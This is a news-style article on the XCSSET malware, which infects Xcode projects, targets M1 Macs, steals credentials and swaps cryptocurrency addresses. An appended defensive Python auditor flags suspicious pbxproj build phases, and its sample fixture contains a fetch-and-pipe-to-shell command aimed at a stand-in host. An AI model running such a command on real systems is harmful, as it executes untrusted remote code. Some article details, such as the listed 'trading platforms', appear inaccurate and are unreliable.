Malware Spread Through Xcode Projects Now Attacks Apple M1-Based Macs



Xcode developers are being targeted by malicious software, now compiled for Apple's new M1 chips, that can steal their private information and is aimed at cryptocurrency applications.


XCSSET was first detected in August 2020 as repackaged payload modules that mimicked legitimate Mac apps, infected a developer's local Xcode project, and injected a malicious payload when the project was built.


In addition to stealing credentials, XCSSET modules can take screenshots, inject malicious JavaScript into websites, steal user data from various applications, and even encrypt files for ransom.

In March of 2021, Kaspersky Lab specialists discovered XCSSET samples compiled for Apple's new M1 chips. We believe this is a sign that the malicious campaign is still active and adapting to new systems.


Researchers at Trend Micro have discovered XCSSET exploiting Safari's current implementation in order to introduce JavaScript backdoors into websites. The malware downloads Safari service packs from a command and control server, installs them, and then configures them to match the victim's OS version. The attackers adapted this malicious campaign to work on macOS Big Sur by adding Safari Update 14.


In addition to the Trojanized version of Safari, the malware uses the debug mode of other browsers, including Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 and Yandex Browser, to carry out UXSS attacks.

The malware also replaces users' cryptocurrency wallet addresses with addresses controlled by the attackers on cryptocurrency trading platforms such as Huobi, Binance, NNCall.net, Envato, and 163.com.


The distribution of XCSSET through compromised Xcode projects is a serious threat. Affected developers who publish their work on GitHub may inadvertently pass the malware on to their users through the compromised projects, which effectively gives the attackers a supply-chain attack vector.
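As an added illustration of the build-time vector described above (not code from the article or from the researchers it cites), the following Python script audits an Xcode `project.pbxproj` for run-script build phases that fetch or execute remote content during a build, which is the kind of check a developer could run on a project pulled from GitHub. It assumes the injected payload executes through such a build phase, a detail the article does not spell out; the project fragment, object ids and URL are constructed.

```python
import re

# Constructed fragment of a project.pbxproj with two run-script build phases.
# AA01 is a normal linter step; AA02 downloads and pipes a remote script into sh.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run SwiftLint";
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Build Helper";
			shellScript = "curl -s http://example.invalid/p.sh | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# Indicators a defender would want flagged in a build phase (constructed list, not exhaustive).
SUSPICIOUS = [
    (r"\b(curl|wget)\b", "downloads remote content at build time"),
    (r"\|\s*(sh|bash|zsh)\b", "pipes data into a shell"),
    (r"\bosascript\b", "runs AppleScript from the build"),
    (r"\bbase64\b", "uses base64 (possible obfuscated payload)"),
    (r"\beval\b", "evaluates a dynamically built command"),
]

# One pbxproj object: `ID /* comment */ = { ... };` (shell-script phases contain no nested braces).
OBJECT_RE = re.compile(r"(\w+)\s*/\*.*?\*/\s*=\s*\{(.*?)\};", re.DOTALL)
# One `key = value;` field, either a quoted (escaped) string or a bare word.
FIELD_RE = re.compile(r'(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|(\w+));')

def unescape(value):
    # Undo pbxproj string escaping: backslash-n, backslash-t, escaped quote, escaped backslash.
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), value)

def find_shell_phases(pbxproj_text):
    """Yield (object_id, name, script) for every PBXShellScriptBuildPhase object."""
    for obj_id, body in OBJECT_RE.findall(pbxproj_text):
        fields = {k: (unescape(q) if q else bare) for k, q, bare in FIELD_RE.findall(body)}
        if fields.get("isa") == "PBXShellScriptBuildPhase":
            yield obj_id, fields.get("name", ""), fields.get("shellScript", "")

def audit_pbxproj(pbxproj_text):
    """Return (object_id, name, reason) for each indicator matched by a run-script phase."""
    findings = []
    for obj_id, name, script in find_shell_phases(pbxproj_text):
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, script):
                findings.append((obj_id, name, reason))
    return findings

if __name__ == "__main__":
    for obj_id, name, reason in audit_pbxproj(SAMPLE_PBXPROJ):
        print(f"{obj_id} ({name}): {reason}")
```

Run it against a real project with `audit_pbxproj(open("App.xcodeproj/project.pbxproj").read())`; a clean project yields an empty list, and any finding is a phase to read by hand before building.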
